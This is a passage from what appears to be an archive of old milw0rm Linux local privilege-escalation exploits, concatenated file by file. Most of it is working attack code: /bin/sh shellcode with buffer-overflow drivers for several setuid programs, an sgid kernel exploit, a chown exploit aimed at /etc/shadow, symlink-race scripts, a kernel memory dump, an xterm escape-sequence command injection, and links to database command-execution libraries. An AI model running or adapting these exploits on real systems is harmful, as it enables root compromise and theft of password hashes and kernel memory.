"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" 37 | "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" 38 | "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" 39 | "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" 40 | "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 41 | 42 | 43 | /* 44 | */ 45 | int main(int argc, char **argv) 46 | { 47 | int x = 0, len = 0; 48 | char buf[BS] = {'A',}; 49 | long retaddr = 0, align = ALIGN; 50 | 51 | if(argc < 2){ 52 | fprintf(stderr, "Usage: %s [ align ]\n", argv[0]); 53 | return EXIT_FAILURE; 54 | } 55 | if(sscanf(argv[1], "%lx", &retaddr) != 1) 56 | die("sscanf"); 57 | if(argc > 2) 58 | align = atoi(argv[2]); 59 | if(align < 0 || align > 3) 60 | die("nice try newblar"); 61 | 62 | strncpy(buf, "://[", 4); 63 | len += 4; 64 | memset(buf+len, NOP, NNOPS); 65 | len += NNOPS; 66 | memcpy(buf+len, sc, SHELL_LEN); 67 | len += SHELL_LEN; 68 | 69 | len += align; 70 | for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr)) 71 | memcpy(buf+len+x, &retaddr, sizeof(retaddr)); 72 | buf[len+x] = ']'; 73 | buf[len+x+1] = 0; 74 | 75 | xmlNanoFTPNewCtxt(buf); 76 | 77 | return EXIT_SUCCESS; 78 | } 79 | 80 | // milw0rm.com [2004-10-26] 81 | -------------------------------------------------------------------------------- /linux/linux_exploits/6851.c: -------------------------------------------------------------------------------- 1 | /* 2 | gw-ftrex.c: 3 | 4 | Linux kernel < 2.6.22 open/ftruncate local exploit 5 | by 6 | 7 | bug information: 8 | http://osvdb.org/49081 9 | 10 | 11 | !!!This is for educational purposes only!!! 
12 | 13 | To use it, you've got to find a sgid directory you've got 14 | permissions to write into (obviously world-writable), e.g: 15 | find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx" 16 | which fortunately is not common those days :) 17 | And also a shell that does not drop sgid privs upon execution (like ash/sash). 18 | E.g: 19 | 20 | test:/fileserver/samba$ ls -ld 21 | drwxrwsrwx 2 root root 4096 2008-10-27 16:27. 22 | test:/fileserver/samba$ id 23 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 24 | test:/fileserver/samba$ /tmp/gw-ftrex 25 | ash shell found! 26 | size=80200 27 | We're evil evil evil! 28 | 29 | $ id 30 | uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data) 31 | 32 | Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia. 33 | */ 34 | 35 | 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | int main(int argc, char *argv[]) 43 | { 44 | char *buf=malloc(3096*1024); //3mb just to be sure 45 | int a,len; 46 | int fd,fd1; 47 | char *buf1; 48 | int shell=0; 49 | 50 | 51 | if (stat("/bin/ash",buf)==0) 52 | { 53 | printf("ash shell found!\n"); 54 | shell=1; 55 | } 56 | 57 | if (shell==0) if (stat("/bin/sash",buf)==0) 58 | { 59 | printf("sash shell found!\n"); 60 | shell=1; 61 | } 62 | 63 | if (shell==0) 64 | { 65 | printf("no suitable shell found (one that does not drop sgid permissions) :(\n"); 66 | exit(2); 67 | } 68 | 69 | 70 | len=0; 71 | if (shell==1) fd=open("/bin/ash",O_RDONLY); 72 | if (shell==2) fd=open("/bin/sash",O_RDONLY); 73 | 74 | while (read(fd,buf+len,1)) len++; 75 | 76 | printf("size=%d\n",len); 77 | fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750); 78 | ftruncate(fd1, len); 79 | buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0); 80 | memcpy(buf1,buf,len); 81 | munmap(buf1,len); 82 | close(fd1);close(fd); 83 | free(buf); 84 | printf("We're evil evil evil!\n\n"); 85 | execv(".evilsploit", NULL); 86 | } 87 | 88 | // milw0rm.com 
[2008-10-27] 89 | -------------------------------------------------------------------------------- /linux/linux_exploits/695.c: -------------------------------------------------------------------------------- 1 | /* RXcscope exploit version 15.5 and minor */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define BSIZE 64 8 | 9 | int 10 | main(int ac, char *av[]) { 11 | pid_t cur; 12 | u_int i=0, lst; 13 | char buffer[BSIZE + 1]; 14 | 15 | fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\ 16 | " version 15.5 and minor \n" \ 17 | " Gangstuck / Psirac\n" \ 18 | " \n\n"); 19 | 20 | if (ac != 3) { 21 | fprintf(stderr, "Usage: %s \n", av[0]); 22 | return 1; 23 | } 24 | 25 | cur=getpid(); 26 | lst=cur+atoi(av[2]); 27 | 28 | fprintf(stdout, " -> Current process id is ..... [%5d]\n" \ 29 | " -> Last process id is ........ [%5d]\n", cur, lst); 30 | 31 | while (++cur != lst) { 32 | snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i); 33 | symlink(av[1], buffer); 34 | } 35 | 36 | return 0; 37 | } 38 | 39 | // milw0rm.com [2004-12-17] 40 | -------------------------------------------------------------------------------- /linux/linux_exploits/71.c: -------------------------------------------------------------------------------- 1 | /* 0x333xgalaga => XGalaga 2.0.34 local game exploit (Red Hat 9.0) 2 | * 3 | * tested against xgalaga-2.0.34-1.i386.rpm 4 | * under Red Hat Linux 9.0 5 | * 6 | * - bug found by Steve Kemp 7 | * - exploit coded by c0wboy @ 0x333 8 | * 9 | * (c) 0x333 Outsider Security Labs / www.0x333.org 10 | * 11 | */ 12 | 13 | 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | #define BIN "/usr/X11R6/bin/xgalaga" 20 | #define SIZE 264 21 | 22 | #define RET 0xbffffe2c /* tested against Red Hat Linux 9.0 */ 23 | #define NOP 0x90 24 | 25 | 26 | unsigned char shellcode[] = 27 | 28 | /* setregid (20,20) shellcode */ 29 | "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" 30 | "\xcd\x80" 31 | 32 | /* exec /bin/sh shellcode */ 33 | 
34 | "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" 35 | "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; 36 | 37 | 38 | void banner (void); 39 | void memret (char *, int, int, int); 40 | 41 | 42 | void banner (void) 43 | { 44 | fprintf (stdout, "\n\n --- xgalaga local GAME exploit by c0wboy ---\n"); 45 | fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---\n\n"); 46 | } 47 | 48 | 49 | void memret (char *buffer, int ret, int size, int align) 50 | { 51 | int i; 52 | int * ptr = (int *) (buffer + align); 53 | 54 | for (i=0; i 6 | * 7 | * Unknown vulnerability in Linux kernel 2.x may allow local users to 8 | * modify the group ID of files, such as NFS exported files in kernel 9 | * 2.4 (CAN-2004-0497). 10 | * 11 | * "Basically, you can change the group of a file you don't own, but not 12 | * of an SGID executable." -- Solar Designer (0dd) 13 | * 14 | * On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you 15 | * don't own, even on local filesystems. This may allow a local attacker to 16 | * perform a privilege escalation, e.g. through the following attack vectors: 17 | * 18 | * 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian 19 | * 3.0, probably others) the shadow group has read access to it. 20 | * 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents. 21 | * 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks. 22 | * 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands. 23 | * 24 | * Usage: 25 | * $ gcc raptor_chown.c -o raptor_chown -Wall 26 | * $ ./raptor_chown /etc/shadow 27 | * [...] 
28 | * -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow 29 | * 30 | * Vulnerable platforms: 31 | * Linux 2.2.x (on nfs exported files, should be vuln) [untested] 32 | * Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested] 33 | * Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested] 34 | */ 35 | 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | #define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux" 43 | #define INFO2 "Copyright (c) 2004 Marco Ivaldi " 44 | 45 | /* Usage: raptor_chown <file>. Makes exactly one chown(2) call on <file> as the unprivileged caller. Exit status 0 means the kernel let a non-owner change the file's group (vulnerable); 1 means the call was refused or <file> could not be used. Nothing here runs with elevated privilege. */ int main(int argc, char **argv) 46 | { 47 | char cmd[256]; /* NOTE(review): fixed-size buffer filled by sprintf() below without a length check */ 48 | 49 | /* print exploit information */ 50 | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); 51 | 52 | /* read command line */ 53 | if (argc != 2) { 54 | fprintf(stderr, "usage: %s file_name\n\n", argv[0]); 55 | exit(1); 56 | } 57 | 58 | /* The whole test. Owner -1 means "leave the uid alone", so this asks only to set the file's group to our own gid. A kernel with the DAC check in sys_chown refuses with EPERM because we are not the owner; a vulnerable kernel silently succeeds. Any other errno (ENOENT, EROFS, ...) is printed verbatim and says nothing about the kernel. */ 59 | if (chown(argv[1], -1, getgid()) < 0) { 60 | switch(errno) { 61 | case EPERM: 62 | fprintf(stderr, "Error: Not vulnerable!\n"); 63 | break; 64 | default: 65 | perror("Error"); 66 | } 67 | exit(1); 68 | } 69 | fprintf(stderr, "Ninpou: sys_chown no jutsu!\n"); 70 | 71 | /* Show the new group with ls. NOTE(review): argv[1] is pasted unquoted into a 256-byte buffer and handed to system(): a path longer than 244 bytes overflows cmd, and shell metacharacters in the path are executed. Harmless for a self-run PoC (no privilege is gained here), but execl("/bin/ls", "ls", "-l", argv[1], (char *)0) would do the same job without either problem. */ 72 | sprintf(cmd, "/bin/ls -l %s", argv[1]); 73 | system(cmd); 74 | 75 | exit(0); 76 | } 77 | 78 | // milw0rm.com [2004-12-24] 79 | -------------------------------------------------------------------------------- /linux/linux_exploits/72.c: -------------------------------------------------------------------------------- 1 | /* 2 | * xtokkaetama 1.0b local game exploit on Red Hat 9.0 3 | * Coded by brahma (31/07/2003) 4 | * 5 | * http://www.debian.org/security/2003/dsa-356 6 | */ 7 | 8 | 9 | #include 10 | #define RETADDR 0xbfffff11 11 | #define DEFAULT_BUFFER_SIZE 29 12 | #define DEFAULT_EGG_SIZE 512 13 | #define NOP 0x90 14 | #define BIN "/usr/X11R6/bin/xtokkaetama" 15 | char shellcode[] = 16 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 17 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 18 
| "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 19 | 20 | unsigned long get_esp(void) { 21 | __asm__("movl %esp,%eax"); 22 | } 23 | 24 | void main(int argc, char *argv[]) { 25 | char *buff, *ptr, *egg; 26 | long *addr_ptr, addr; 27 | int bsize=DEFAULT_BUFFER_SIZE; 28 | int i, eggsize=DEFAULT_EGG_SIZE; 29 | 30 | if (argc > 1) bsize = atoi(argv[1]); 31 | if (argc > 2) eggsize = atoi(argv[2]); 32 | 33 | 34 | if (!(buff = malloc(bsize))) { 35 | printf("Can't allocate memory.\n"); 36 | exit(0); 37 | } 38 | if (!(egg = malloc(eggsize))) { 39 | printf("Can't allocate memory.\n"); 40 | exit(0); 41 | } 42 | 43 | addr = RETADDR; 44 | printf("Using address: 0x%x\n", addr); 45 | 46 | ptr = buff; 47 | addr_ptr = (long *) ptr; 48 | for (i = 0; i < bsize; i+=4) 49 | *(addr_ptr++) = addr; 50 | 51 | ptr = egg; 52 | for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) 53 | *(ptr++) = NOP; 54 | 55 | for (i = 0; i < strlen(shellcode); i++) 56 | *(ptr++) = shellcode[i]; 57 | 58 | buff[bsize - 1] = '\0'; 59 | egg[eggsize - 1] = '\0'; 60 | 61 | memcpy(egg,"EGG=",4); 62 | putenv(egg); 63 | execl(BIN,BIN,"-display",buff,NULL); 64 | } 65 | 66 | 67 | 68 | // milw0rm.com [2003-08-01] 69 | -------------------------------------------------------------------------------- /linux/linux_exploits/7313.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash - 2 | 3 | echo ' 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | struct utmp entry; 14 | int i; 15 | 16 | entry.ut_type=LOGIN_PROCESS; 17 | strcpy(entry.ut_line,"/tmp/x"); 18 | entry.ut_time=0; 19 | strcpy(entry.ut_user,"badguy"); 20 | strcpy(entry.ut_host,"badhost"); 21 | entry.ut_addr=0; 22 | for(i=1;i<9;i++) { 23 | entry.ut_pid=(pid_t)( i + (int)getpid() ); 24 | sprintf(entry.ut_id,"bad%d",i); 25 | pututline(&entry); 26 | } 27 | } 28 | ' > /tmp/fillutmp.c 29 | 30 | cc -o /tmp/fillutmp /tmp/fillutmp.c 31 | 32 | echo 'Ask 
someone with group utmp privileges to do:' 33 | echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' 34 | echo -n 'Press [RETURN] to continue... ' 35 | read ANS 36 | 37 | echo ' 38 | #include 39 | 40 | int main(int argc, char *argv[]) 41 | { 42 | while(1) 43 | { 44 | unlink("/tmp/x"); 45 | symlink(argv[1],"/tmp/x"); 46 | unlink("/tmp/x"); 47 | symlink(argv[2],"/tmp/x"); 48 | } 49 | } 50 | ' > /tmp/jigglelnk.c 51 | 52 | cc -o /tmp/jigglelnk /tmp/jigglelnk.c 53 | 54 | HOST=`hostname` # or simply localhost? 55 | echo "Which tty do you think a 'telnet $HOST' will use next?" 56 | echo "(Do that telnet and see...)" 57 | read TTY 58 | echo "You said it will be '$TTY' ..." 59 | 60 | ATK=/etc/debian_version # should be /etc/shadow 61 | 62 | echo "Starting symlink re-jiggler ..." 63 | /tmp/jigglelnk $TTY $ATK & 64 | JIG=$! 65 | 66 | LOOP=0 67 | while :; do 68 | ((LOOP = $LOOP + 1)) 69 | echo; echo; echo "Try = $LOOP" 70 | 71 | /tmp/fillutmp 72 | 73 | echo "Telnetting... if login succeeds, just exit for next try..." 74 | /usr/bin/telnet $HOST 75 | 76 | LS=`ls -ld $ATK` 77 | case "$LS" in 78 | *root*root* ) ;; # not done yet... 79 | * ) 80 | echo; echo 81 | echo "Success after $LOOP tries!" 82 | echo "$LS" 83 | echo; echo 84 | break 85 | ;; 86 | esac 87 | done 88 | 89 | kill $JIG 90 | rm /tmp/fillutmp /tmp/jigglelnk /tmp/x 91 | 92 | # ... 93 | # ~$ logout 94 | # Connection closed by foreign host. 95 | # Success after 12 tries! 96 | # -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version 97 | 98 | # milw0rm.com [2008-12-01] 99 | -------------------------------------------------------------------------------- /linux/linux_exploits/741.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | #^^^^^^^^^^^^^^^^\....,,,,|:::::::____****** 3 | #HTGET <= 0.9.x local lame r00t exploit * 4 | #written by nekd0 of Unl0ck Research Team * 5 | #(c) .unl0ck research team 2004-2005. 
* 6 | # http://unl0ck.void.ru * 7 | #................/^^^^''''|:::::::----****** 8 | 9 | $shellcode = 10 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80". 11 | "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31". 12 | "\xc0\x88\x43\x07\x89\x5b\x08\x89". 13 | "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0". 14 | "\x0b\xcd\x80\xe8\xe6\xff\xff\xff". 15 | "/bin/sh"; 16 | 17 | $len = 288; 18 | $ret = 0xbfffd62a; #red hat 9.0 19 | $nop = "\x90"; 20 | $offset = 0 ; 21 | $vulnprog="/usr/bin/htget"; 22 | 23 | if (@ARGV == 1) { 24 | $offset = $ARGV[0];} 25 | 26 | if (!-u($vulnprog)){print "$vulnprog is not suid... exiting\n";exit();} 27 | 28 | for ($i=0; $i<($len-length($shellcode)-100);$i++) 29 | {$buffer .= $nop;} 30 | 31 | $buffer .= $shellcode; 32 | 33 | print ("Address: 0x",sprintf('%lx',($ret+$offset)),"\n"); 34 | 35 | $new_ret = pack('l',($ret + $offset)); 36 | 37 | for ($i+=length($shellcode); $i<$len; $i+=4) 38 | {$buffer .=$new_ret} 39 | 40 | exec("$vulnprog $buffer"); 41 | 42 | # milw0rm.com [2005-01-05] 43 | -------------------------------------------------------------------------------- /linux/linux_exploits/756.c: -------------------------------------------------------------------------------- 1 | /* 2 | This proof-of-concept demonstrates the existence of the vulnerability 3 | reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05). 4 | It has been tested against exim-4.41 under Debian GNU/Linux. 5 | Note that setuid () is not included in the shellcode to avoid 6 | script-kidding. 7 | My RET is 0xbffffae4, but fb.pl can brute-force it for you. 
8 | 9 | ----------- 10 | Brute Force fb.pl: 11 | ----------- 12 | 13 | #!/usr/bin/perl 14 | 15 | $cnt = 0xbffffa10; 16 | 17 | while (1) { 18 | $hex = sprintf ("0x%x", $cnt); 19 | $res = system ("./exploit $hex"); 20 | printf "$hex : $res\n"; 21 | $cnt += 4; 22 | } 23 | 24 | --------- 25 | exploit.c: 26 | --------- 27 | */ 28 | 29 | #define NOP 0x90 30 | #define TAMBUF 368 31 | #define INIC_SH 20 32 | #include 33 | 34 | int main (int argc, char **argv) { 35 | 36 | static char shellcode[]= 37 | "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" 38 | "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e" 39 | "\x2f\x73\x68\x58"; 40 | 41 | char buffer [TAMBUF + 1]; 42 | char cadena [TAMBUF + 5]; 43 | int cont; 44 | unsigned long ret = strtoul (argv[1], NULL, 16); 45 | 46 | for (cont = 0; cont < TAMBUF / 4; cont++) 47 | *( (long *) buffer + cont) = ret; 48 | 49 | for (cont = 0; cont < strlen (shellcode); cont++) 50 | buffer [cont + INIC_SH] = shellcode [cont]; 51 | 52 | for (cont = 0; cont < INIC_SH; cont++) 53 | buffer [cont] = NOP; 54 | 55 | buffer [TAMBUF] = 0; 56 | printf ("RET = 0x%x\n", ret); 57 | strcpy (cadena, "::%A"); 58 | strcat (cadena, buffer); 59 | execl ("/usr/sbin/exim", "./exim", "-bh", cadena, (char *) 0); 60 | } 61 | 62 | // milw0rm.com [2005-01-15] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/7618.c: -------------------------------------------------------------------------------- 1 | /* 2 | * cve-2008-4113.c 3 | * 4 | * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure 5 | * Jon Oberheide 6 | * http://jon.oberheide.org 7 | * 8 | * Information: 9 | * 10 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 11 | * 12 | * The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream 13 | * Control Transmission Protocol (sctp) implementation in the Linux kernel 14 | * before 2.6.26.4, when the SCTP-AUTH extension is enabled, 
relies on an 15 | * untrusted length value to limit copying of data from kernel memory, which 16 | * allows local users to obtain sensitive information via a crafted 17 | * SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function. 18 | * 19 | * Notes: 20 | * 21 | * If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an 22 | * unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory 23 | * out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will 24 | * trigger a kernel OOPS. 25 | */ 26 | 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #ifndef SCTP_HMAC_IDENT 36 | #define SCTP_HMAC_IDENT 22 37 | #endif 38 | 39 | #define DUMP_SIZE 256*1024 40 | #define DUMP_FILE "mem.dump" 41 | 42 | int 43 | main(int argc, char **argv) 44 | { 45 | int ret, sock; 46 | FILE *dumpfile; 47 | char *memdump, *err; 48 | socklen_t memlen = DUMP_SIZE; 49 | 50 | memdump = malloc(DUMP_SIZE); 51 | if (!memdump) { 52 | err = "malloc(3) failed"; 53 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 54 | return 1; 55 | } 56 | memset(memdump, 0, DUMP_SIZE); 57 | 58 | printf("[+] creating IPPROTO_SCTP socket\n"); 59 | 60 | sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); 61 | if (sock == -1) { 62 | err = "socket(2) failed"; 63 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 64 | return 1; 65 | } 66 | 67 | printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen); 68 | 69 | ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen); 70 | if (ret == -1) { 71 | err = "getsockopt(2) failed"; 72 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 73 | return 1; 74 | } 75 | 76 | printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE); 77 | 78 | dumpfile = fopen(DUMP_FILE, "wb"); 79 | if (!dumpfile) { 80 | err = "fopen(3) failed"; 81 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 82 | return 1; 83 | } 84 | 
fwrite(memdump, 1, memlen, dumpfile); 85 | fclose(dumpfile); 86 | 87 | printf("[+] done.\n"); 88 | 89 | return 0; 90 | } 91 | 92 | // milw0rm.com [2008-12-29] 93 | -------------------------------------------------------------------------------- /linux/linux_exploits/7681.txt: -------------------------------------------------------------------------------- 1 | Package: xterm 2 | Version: 222-1etch2 3 | Severity: grave 4 | Tags: security patch 5 | Justification: user security hole 6 | 7 | 8 | DECRQSS (Device Control Request Status String, the "DCS $ q ... ST" query) asks the terminal to report a setting, and xterm answers an invalid request by echoing 9 | the request string back to the application unmodified. That reply arrives on the same input as keystrokes, so any newline-terminated text inside the request is run by the shell reading the terminal. For example, 10 | perl -e 'print "\eP\$q\nbad-command\n\e\\"' 11 | would run bad-command with the privileges of the user sitting at that xterm. 12 | 13 | Exploitability is the same as for the "window title reporting" issue 14 | in DSA-380: the attacker only has to get the bytes displayed — include the DCS string in an email message to the victim, 15 | in a file the victim will cat, or arrange to have it in syslog to be viewed by root. 16 | 17 | Original: 18 | http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 19 | 20 | Test (harmless — whoami only prints a name — but run it in an xterm whose shell you are watching, because that shell is what the reply gets typed into): 21 | 22 | perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log 23 | cat bla.log 24 | 25 | If your user name is printed after the cat as though you had typed whoami, this xterm is vulnerable and you should update. Until it is patched, treat anything that writes untrusted bytes to the terminal (cat, tail -f on a log, a mail reader) as a vector, and view such data through a filter that makes control characters visible, e.g. cat -v. 
26 | 27 | # milw0rm.com [2009-01-06] 28 | -------------------------------------------------------------------------------- /linux/linux_exploits/776.c: -------------------------------------------------------------------------------- 1 | /* 2 | /usr/bin/trn local root exploit 3 | By ZzagorR - http://www.rootbinbash.com 4 | */ 5 | /* 6 | sh-2.05b$ ./trn 7 | usage : ./trn ret buf 8 | example : ./trn 0xbfffff64 9 | [+] mandrake 9.2 = 0xbfffff96 10 | [+] slackware 10.0.0= 0xbfffff98 11 | [+] slackware 9.1.0= 0xbfffff84 12 | sh-2.05b$ 13 | sh-2.05b$ ./trn 0xbfffff84 128 14 | [BOO %] 128 15 | [RET %] bfffff84 16 | sh-2.05b# 17 | sh-2.05b# id 18 | uid=0(root) gid=98(nobody) groups=98(nobody) 19 | sh-2.05b# cat /etc/shadow 20 | root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0::::: 21 | TEST : 22 | MANDRAKE 9.2 23 | SLACKWARE 10.0.0 24 | SLACKWARE 9.1.0 25 | http://www.rootbinbash.com/d0kum4n/trn-test.txt 26 | BOO: 27 | $trn `perl -e 'print "A" x 120'` 28 | $trn `perl -e 'print "A" x 124'` 29 | $trn `perl -e 'print "A" x 128'` 30 | Segmentation fault 31 | BOO=128 32 | */ 33 | 34 | #include 35 | #include 36 | #define NEREDE "/usr/bin/trn" 37 | 38 | char caylarbeles[] = 39 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 40 | "\x31\xc0\x50\x68\x2f\x2f\x73\x68" 41 | "\x68\x2f\x62\x69\x6e\x89\xe3\x50" 42 | "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 43 | 44 | int main(int argc, char *argv[]){ 45 | int bizim; 46 | char bufe[1000]; 47 | char *tayfasi; 48 | if (argc < 3) { 49 | printf ("{ trn l0c4l r00t 3xpl01t }\n"); 50 | printf ("{ By ZzagorR - http://www.rootbinbash.com }\n"); 51 | printf ("{ usage : %s ret buf }\n",argv[0]); 52 | printf ("{ example : %s 0xbfffff99 142 }\n",argv[0]); 53 | printf ("{ mandrake 9.2 = 0xbfffff96 }\n"); 54 | printf ("{ slackware 10.0.0 = 0xbfffff98 }\n"); 55 | printf ("{ slackware 9.1.0 = 0xbfffff84 }\n"); 56 | exit(1); 57 | }else{ 58 | unsigned long RET=strtoul(argv[1], NULL, 16); 59 | int BOO = atoi(argv[2]); 60 | printf ("[BOO %] %i\n",BOO); 61 | printf ("[RET %] 
%x\n",RET); 62 | tayfasi = bufe; 63 | memset(bufe, 0x41,256-strlen(caylarbeles)); 64 | sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles); 65 | for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 ) 66 | *(long*)(tayfasi+bizim) = RET; 67 | execl(NEREDE, NEREDE , bufe, NULL); 68 | } 69 | } 70 | 71 | // milw0rm.com [2005-01-26] 72 | -------------------------------------------------------------------------------- /linux/linux_exploits/779.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ## Had to remove local -r to get it to work via sh on my box 3 | ## Root's encrypted password was in toupper form but the 4 | ## super stated it worked fine for him (Gentoo with ncpfs 2.2.5) 5 | ## If it worked for you send an email to info@milw0rm.com /str0ke 6 | 7 | (echo 'head1 by super' 8 | echo -e '==============\n' 9 | (function head1(){ 10 | (local -r MNTDIR=~/mnt.$$ 11 | (mv ~/.nwclient ~/.nwclient.temp 12 | ln -sf $1 ~/.nwclient 13 | mkdir $MNTDIR)2>/dev/null 14 | (echo $1 15 | ncpmount $MNTDIR 16 | echo) 17 | (rmdir $MNTDIR 18 | rm ~/.nwclient 19 | mv .nwclient.temp .nwclient)2>/dev/null)} 20 | (for i in /etc/*shadow* 21 | do head1 $i 22 | done)))# 23 | 24 | # milw0rm.com [2005-01-30] 25 | -------------------------------------------------------------------------------- /linux/linux_exploits/7855.txt: -------------------------------------------------------------------------------- 1 | PostgreSQL UDF for command execution 2 | 3 | [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html 4 | [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz 5 | 6 | mirror: http://exploit-db.com/sploits/2009-lib_postgresqludf_sys_0.0.1.tar.gz 7 | 8 | # milw0rm.com [2009-01-25] 9 | -------------------------------------------------------------------------------- /linux/linux_exploits/7856.txt: 
-------------------------------------------------------------------------------- 1 | MySQL UDF for command execution 2 | 3 | [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html 4 | [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz 5 | 6 | mirror: http://exploit-db.com/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz 7 | 8 | # milw0rm.com [2009-01-25] 9 | -------------------------------------------------------------------------------- /linux/linux_exploits/792.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright Kevin Finisterre 3 | * 4 | * ** DISCLAIMER ** I am in no way responsible for your stupidity. 5 | * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code. 6 | * 7 | * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING *** 8 | * ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses). 9 | * ** WARNING ** have a boot disk ready incase some thing goes wrong. 10 | * 11 | * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05 12 | * 13 | * this exploits a vulnerability in the PERLIO_DEBUG functionality 14 | * tested against sperl5.8.4 on Debian 15 | * 16 | * kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c 17 | * kfinisterre@jdam:~$ ls -al /etc/ld.so.preload 18 | * ls: /etc/ld.so.preload: No such file or directory 19 | * kfinisterre@jdam:~$ ./ex_perl 20 | * sperl needs fd script 21 | * You should not call sperl directly; do you need to change a #! line 22 | * from sperl to perl? 
